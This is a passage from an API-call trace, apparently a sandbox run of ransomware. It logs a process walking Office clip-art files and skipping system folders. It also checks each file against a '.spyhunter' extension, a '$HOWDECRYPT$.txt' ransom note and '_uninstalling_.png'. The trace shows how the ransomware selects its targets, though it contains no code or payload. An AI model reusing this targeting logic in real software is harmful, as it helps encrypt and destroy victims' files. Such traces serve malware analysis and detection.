lpString2="$Recycle.bin") returned 1 [0098.202] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.202] lstrcmpiW (lpString1="J0105388.WMF", lpString2="System Volume Information") returned -1 [0098.202] lstrlenW (lpString="System Volume Information") returned 25 [0098.202] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 67 [0098.202] StrStrIW (lpFirst="J0105388.WMF", lpSrch=".spyhunter") returned 0x0 [0098.202] lstrcmpW (lpString1="J0105388.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.202] lstrcmpW (lpString1="J0105388.WMF", lpString2="_uninstalling_.png") returned 1 [0098.202] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned 67 [0098.202] GetProcessHeap () returned 0x2c0000 [0098.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e418 [0098.202] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2468) returned 0x2c16890 [0098.202] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.202] lstrcmpiW (lpString1="J0105390.WMF", lpString2="Windows") returned -1 [0098.202] lstrlenW (lpString="Windows") returned 7 [0098.202] lstrcmpiW (lpString1="J0105390.WMF", lpString2="$Recycle.bin") returned 1 [0098.202] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.202] lstrcmpiW (lpString1="J0105390.WMF", lpString2="System Volume Information") returned -1 [0098.202] lstrlenW (lpString="System Volume Information") returned 25 [0098.203] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 67 [0098.203] StrStrIW (lpFirst="J0105390.WMF", lpSrch=".spyhunter") returned 0x0 [0098.203] lstrcmpW (lpString1="J0105390.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.203] lstrcmpW (lpString1="J0105390.WMF", lpString2="_uninstalling_.png") returned 1 [0098.203] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 67 [0098.203] GetProcessHeap () returned 0x2c0000 [0098.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e4e8 [0098.203] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2470) returned 0x2c16890 [0098.203] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.203] lstrcmpiW (lpString1="J0105396.WMF", lpString2="Windows") returned -1 [0098.203] lstrlenW (lpString="Windows") returned 7 [0098.203] lstrcmpiW (lpString1="J0105396.WMF", lpString2="$Recycle.bin") returned 1 [0098.203] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.203] lstrcmpiW (lpString1="J0105396.WMF", lpString2="System Volume Information") returned -1 [0098.203] lstrlenW (lpString="System Volume Information") returned 25 [0098.203] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 67 [0098.203] StrStrIW (lpFirst="J0105396.WMF", lpSrch=".spyhunter") returned 0x0 [0098.203] lstrcmpW (lpString1="J0105396.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.203] lstrcmpW (lpString1="J0105396.WMF", lpString2="_uninstalling_.png") returned 1 [0098.203] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned 67 [0098.203] GetProcessHeap () returned 0x2c0000 [0098.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e5b8 [0098.204] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2478) returned 0x2c16890 [0098.204] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.204] lstrcmpiW (lpString1="J0105398.WMF", lpString2="Windows") returned -1 [0098.204] lstrlenW (lpString="Windows") returned 7 [0098.204] lstrcmpiW (lpString1="J0105398.WMF", lpString2="$Recycle.bin") returned 1 [0098.204] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.204] lstrcmpiW (lpString1="J0105398.WMF", lpString2="System Volume Information") returned -1 [0098.204] lstrlenW (lpString="System Volume Information") returned 25 [0098.204] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 67 [0098.204] StrStrIW (lpFirst="J0105398.WMF", lpSrch=".spyhunter") returned 0x0 [0098.204] lstrcmpW (lpString1="J0105398.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.204] lstrcmpW (lpString1="J0105398.WMF", lpString2="_uninstalling_.png") returned 1 [0098.204] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 67 [0098.204] GetProcessHeap () returned 0x2c0000 [0098.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e688 [0098.204] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2480) returned 0x2c16890 [0098.204] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.204] lstrcmpiW (lpString1="J0105410.WMF", lpString2="Windows") returned -1 [0098.204] lstrlenW (lpString="Windows") returned 7 [0098.205] lstrcmpiW (lpString1="J0105410.WMF", lpString2="$Recycle.bin") returned 1 [0098.205] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.205] lstrcmpiW (lpString1="J0105410.WMF", lpString2="System Volume Information") returned -1 [0098.205] lstrlenW (lpString="System Volume Information") returned 25 [0098.205] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 67 [0098.205] StrStrIW (lpFirst="J0105410.WMF", lpSrch=".spyhunter") returned 0x0 [0098.205] lstrcmpW (lpString1="J0105410.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.205] lstrcmpW (lpString1="J0105410.WMF", lpString2="_uninstalling_.png") returned 1 [0098.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 67 [0098.205] GetProcessHeap () returned 0x2c0000 [0098.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c301c8 [0098.205] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2488) returned 0x2c16890 [0098.205] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.205] lstrcmpiW (lpString1="J0105412.WMF", lpString2="Windows") returned -1 [0098.205] lstrlenW (lpString="Windows") returned 7 [0098.205] lstrcmpiW (lpString1="J0105412.WMF", lpString2="$Recycle.bin") returned 1 [0098.205] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.205] lstrcmpiW (lpString1="J0105412.WMF", lpString2="System Volume Information") returned -1 [0098.205] lstrlenW (lpString="System Volume Information") returned 25 [0098.205] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 67 [0098.205] StrStrIW (lpFirst="J0105412.WMF", lpSrch=".spyhunter") returned 0x0 [0098.205] lstrcmpW (lpString1="J0105412.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.206] lstrcmpW (lpString1="J0105412.WMF", lpString2="_uninstalling_.png") returned 1 [0098.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 67 [0098.206] GetProcessHeap () returned 0x2c0000 [0098.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30298 [0098.206] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2490) returned 0x2c16890 [0098.206] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.206] lstrcmpiW (lpString1="J0105414.WMF", lpString2="Windows") returned -1 [0098.206] lstrlenW (lpString="Windows") returned 7 [0098.206] lstrcmpiW (lpString1="J0105414.WMF", lpString2="$Recycle.bin") returned 1 [0098.206] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.206] lstrcmpiW (lpString1="J0105414.WMF", lpString2="System Volume Information") returned -1 [0098.206] lstrlenW (lpString="System Volume Information") returned 25 [0098.206] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 67 [0098.206] StrStrIW (lpFirst="J0105414.WMF", lpSrch=".spyhunter") returned 0x0 [0098.206] lstrcmpW (lpString1="J0105414.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.206] lstrcmpW (lpString1="J0105414.WMF", lpString2="_uninstalling_.png") returned 1 [0098.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned 67 [0098.206] GetProcessHeap () returned 0x2c0000 [0098.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30368 [0098.206] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2498) returned 0x2c16890 [0098.206] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.207] lstrcmpiW (lpString1="J0105490.WMF", lpString2="Windows") returned -1 [0098.207] lstrlenW (lpString="Windows") returned 7 [0098.207] lstrcmpiW (lpString1="J0105490.WMF", lpString2="$Recycle.bin") returned 1 [0098.207] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.207] lstrcmpiW (lpString1="J0105490.WMF", lpString2="System Volume Information") returned -1 [0098.207] lstrlenW (lpString="System Volume Information") returned 25 [0098.207] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 67 [0098.207] StrStrIW (lpFirst="J0105490.WMF", lpSrch=".spyhunter") returned 0x0 [0098.207] lstrcmpW (lpString1="J0105490.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.207] lstrcmpW (lpString1="J0105490.WMF", lpString2="_uninstalling_.png") returned 1 [0098.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 67 [0098.207] GetProcessHeap () returned 0x2c0000 [0098.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30438 [0098.207] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24a0) returned 0x2c16890 [0098.207] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.207] lstrcmpiW (lpString1="J0105496.WMF", lpString2="Windows") returned -1 [0098.207] lstrlenW (lpString="Windows") returned 7 [0098.207] lstrcmpiW (lpString1="J0105496.WMF", lpString2="$Recycle.bin") returned 1 [0098.207] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.207] lstrcmpiW (lpString1="J0105496.WMF", lpString2="System Volume Information") returned -1 [0098.207] lstrlenW (lpString="System Volume Information") returned 25 [0098.208] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 67 [0098.208] StrStrIW (lpFirst="J0105496.WMF", lpSrch=".spyhunter") returned 0x0 [0098.208] lstrcmpW (lpString1="J0105496.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.208] lstrcmpW (lpString1="J0105496.WMF", lpString2="_uninstalling_.png") returned 1 [0098.208] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 67 [0098.208] GetProcessHeap () returned 0x2c0000 [0098.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30508 [0098.208] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24a8) returned 0x2c16890 [0098.208] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.208] lstrcmpiW (lpString1="J0105502.WMF", lpString2="Windows") returned -1 [0098.208] lstrlenW (lpString="Windows") returned 7 [0098.208] lstrcmpiW (lpString1="J0105502.WMF", lpString2="$Recycle.bin") returned 1 [0098.208] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.208] lstrcmpiW (lpString1="J0105502.WMF", lpString2="System Volume Information") returned -1 [0098.208] lstrlenW (lpString="System Volume Information") returned 25 [0098.208] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 67 [0098.208] StrStrIW (lpFirst="J0105502.WMF", lpSrch=".spyhunter") returned 0x0 [0098.208] lstrcmpW (lpString1="J0105502.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.208] lstrcmpW (lpString1="J0105502.WMF", lpString2="_uninstalling_.png") returned 1 [0098.208] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 67 [0098.208] GetProcessHeap () returned 0x2c0000 [0098.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c305d8 [0098.209] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24b0) returned 0x2c16890 [0098.209] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.209] lstrcmpiW (lpString1="J0105504.WMF", lpString2="Windows") returned -1 [0098.209] lstrlenW (lpString="Windows") returned 7 [0098.209] lstrcmpiW (lpString1="J0105504.WMF", lpString2="$Recycle.bin") returned 1 [0098.209] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.209] lstrcmpiW (lpString1="J0105504.WMF", lpString2="System Volume Information") returned -1 [0098.209] lstrlenW (lpString="System Volume Information") returned 25 [0098.209] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 67 [0098.209] StrStrIW (lpFirst="J0105504.WMF", lpSrch=".spyhunter") returned 0x0 [0098.209] lstrcmpW (lpString1="J0105504.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.209] lstrcmpW (lpString1="J0105504.WMF", lpString2="_uninstalling_.png") returned 1 [0098.209] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 67 [0098.209] GetProcessHeap () returned 0x2c0000 [0098.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c306a8 [0098.209] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24b8) returned 0x2c16890 [0098.209] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.209] lstrcmpiW (lpString1="J0105506.WMF", lpString2="Windows") returned -1 [0098.209] lstrlenW (lpString="Windows") returned 7 [0098.209] lstrcmpiW (lpString1="J0105506.WMF", lpString2="$Recycle.bin") returned 1 [0098.210] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.210] lstrcmpiW (lpString1="J0105506.WMF", lpString2="System Volume Information") returned -1 [0098.210] lstrlenW (lpString="System Volume Information") returned 25 [0098.210] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 67 [0098.210] StrStrIW (lpFirst="J0105506.WMF", lpSrch=".spyhunter") returned 0x0 [0098.210] lstrcmpW (lpString1="J0105506.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.210] lstrcmpW (lpString1="J0105506.WMF", lpString2="_uninstalling_.png") returned 1 [0098.210] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 67 [0098.210] GetProcessHeap () returned 0x2c0000 [0098.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30778 [0098.210] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24c0) returned 0x2c16890 [0098.210] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.210] lstrcmpiW (lpString1="J0105520.WMF", lpString2="Windows") returned -1 [0098.210] lstrlenW (lpString="Windows") returned 7 [0098.210] lstrcmpiW (lpString1="J0105520.WMF", lpString2="$Recycle.bin") returned 1 [0098.210] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.210] lstrcmpiW (lpString1="J0105520.WMF", lpString2="System Volume Information") returned -1 [0098.210] lstrlenW (lpString="System Volume Information") returned 25 [0098.210] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 67 [0098.210] StrStrIW (lpFirst="J0105520.WMF", lpSrch=".spyhunter") returned 0x0 [0098.210] lstrcmpW (lpString1="J0105520.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.210] lstrcmpW (lpString1="J0105520.WMF", lpString2="_uninstalling_.png") returned 1 [0098.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 67 [0098.211] GetProcessHeap () returned 0x2c0000 [0098.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30848 [0098.211] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24c8) returned 0x2c16890 [0098.211] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.211] lstrcmpiW (lpString1="J0105526.WMF", lpString2="Windows") returned -1 [0098.211] lstrlenW (lpString="Windows") returned 7 [0098.211] lstrcmpiW (lpString1="J0105526.WMF", lpString2="$Recycle.bin") returned 1 [0098.211] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.211] lstrcmpiW (lpString1="J0105526.WMF", lpString2="System Volume Information") returned -1 [0098.211] lstrlenW (lpString="System Volume Information") returned 25 [0098.211] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 67 [0098.211] StrStrIW (lpFirst="J0105526.WMF", lpSrch=".spyhunter") returned 0x0 [0098.211] lstrcmpW (lpString1="J0105526.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.211] lstrcmpW (lpString1="J0105526.WMF", lpString2="_uninstalling_.png") returned 1 [0098.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 67 [0098.211] GetProcessHeap () returned 0x2c0000 [0098.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30918 [0098.211] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24d0) returned 0x2c16890 [0098.211] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.211] lstrcmpiW (lpString1="J0105530.WMF", lpString2="Windows") returned -1 [0098.212] lstrlenW (lpString="Windows") returned 7 [0098.212] lstrcmpiW (lpString1="J0105530.WMF", lpString2="$Recycle.bin") returned 1 [0098.212] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.212] lstrcmpiW (lpString1="J0105530.WMF", lpString2="System Volume Information") returned -1 [0098.212] lstrlenW (lpString="System Volume Information") returned 25 [0098.212] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 67 [0098.212] StrStrIW (lpFirst="J0105530.WMF", lpSrch=".spyhunter") returned 0x0 [0098.212] lstrcmpW (lpString1="J0105530.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.212] lstrcmpW (lpString1="J0105530.WMF", lpString2="_uninstalling_.png") returned 1 [0098.212] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 67 [0098.212] GetProcessHeap () returned 0x2c0000 [0098.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c309e8 [0098.212] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24d8) returned 0x2c16890 [0098.212] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.212] lstrcmpiW (lpString1="J0105588.WMF", lpString2="Windows") returned -1 [0098.212] lstrlenW (lpString="Windows") returned 7 [0098.212] lstrcmpiW (lpString1="J0105588.WMF", lpString2="$Recycle.bin") returned 1 [0098.212] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.212] lstrcmpiW (lpString1="J0105588.WMF", lpString2="System Volume Information") returned -1 [0098.212] lstrlenW (lpString="System Volume Information") returned 25 [0098.212] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 67 [0098.213] StrStrIW (lpFirst="J0105588.WMF", lpSrch=".spyhunter") returned 0x0 [0098.213] lstrcmpW (lpString1="J0105588.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.213] lstrcmpW (lpString1="J0105588.WMF", lpString2="_uninstalling_.png") returned 1 [0098.213] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 67 [0098.213] GetProcessHeap () returned 0x2c0000 [0098.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30ab8 [0098.213] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24e0) returned 0x2c16890 [0098.213] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.213] lstrcmpiW (lpString1="J0105600.WMF", lpString2="Windows") returned -1 [0098.213] lstrlenW (lpString="Windows") returned 7 [0098.213] lstrcmpiW (lpString1="J0105600.WMF", lpString2="$Recycle.bin") returned 1 [0098.213] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.213] lstrcmpiW (lpString1="J0105600.WMF", lpString2="System Volume Information") returned -1 [0098.213] lstrlenW (lpString="System Volume Information") returned 25 [0098.213] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 67 [0098.213] StrStrIW (lpFirst="J0105600.WMF", lpSrch=".spyhunter") returned 0x0 [0098.213] lstrcmpW (lpString1="J0105600.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.213] lstrcmpW (lpString1="J0105600.WMF", lpString2="_uninstalling_.png") returned 1 [0098.213] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 67 [0098.213] GetProcessHeap () returned 0x2c0000 [0098.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30b88 [0098.214] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24e8) returned 0x2c16890 [0098.214] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.214] lstrcmpiW (lpString1="J0105638.WMF", lpString2="Windows") returned -1 [0098.214] lstrlenW (lpString="Windows") returned 7 [0098.214] lstrcmpiW (lpString1="J0105638.WMF", lpString2="$Recycle.bin") returned 1 [0098.214] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.214] lstrcmpiW (lpString1="J0105638.WMF", lpString2="System Volume Information") returned -1 [0098.214] lstrlenW (lpString="System Volume Information") returned 25 [0098.214] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 67 [0098.214] StrStrIW (lpFirst="J0105638.WMF", lpSrch=".spyhunter") returned 0x0 [0098.214] lstrcmpW (lpString1="J0105638.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.214] lstrcmpW (lpString1="J0105638.WMF", lpString2="_uninstalling_.png") returned 1 [0098.214] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 67 [0098.214] GetProcessHeap () returned 0x2c0000 [0098.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30c58 [0098.214] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24f0) returned 0x2c16890 [0098.214] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.214] lstrcmpiW (lpString1="J0105710.WMF", lpString2="Windows") returned -1 [0098.214] lstrlenW (lpString="Windows") returned 7 [0098.214] lstrcmpiW (lpString1="J0105710.WMF", lpString2="$Recycle.bin") returned 1 [0098.214] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.214] lstrcmpiW (lpString1="J0105710.WMF", lpString2="System Volume Information") returned -1 [0098.215] lstrlenW (lpString="System Volume Information") returned 25 [0098.215] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 67 [0098.215] StrStrIW (lpFirst="J0105710.WMF", lpSrch=".spyhunter") returned 0x0 [0098.215] lstrcmpW (lpString1="J0105710.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.215] lstrcmpW (lpString1="J0105710.WMF", lpString2="_uninstalling_.png") returned 1 [0098.215] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 67 [0098.215] GetProcessHeap () returned 0x2c0000 [0098.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30d28 [0098.215] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x24f8) returned 0x2c16890 [0098.215] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.215] lstrcmpiW (lpString1="J0105846.WMF", lpString2="Windows") returned -1 [0098.215] lstrlenW (lpString="Windows") returned 7 [0098.215] lstrcmpiW (lpString1="J0105846.WMF", lpString2="$Recycle.bin") returned 1 [0098.215] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.215] lstrcmpiW (lpString1="J0105846.WMF", lpString2="System Volume Information") returned -1 [0098.215] lstrlenW (lpString="System Volume Information") returned 25 [0098.215] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 67 [0098.215] StrStrIW (lpFirst="J0105846.WMF", lpSrch=".spyhunter") returned 0x0 [0098.215] lstrcmpW (lpString1="J0105846.WMF", 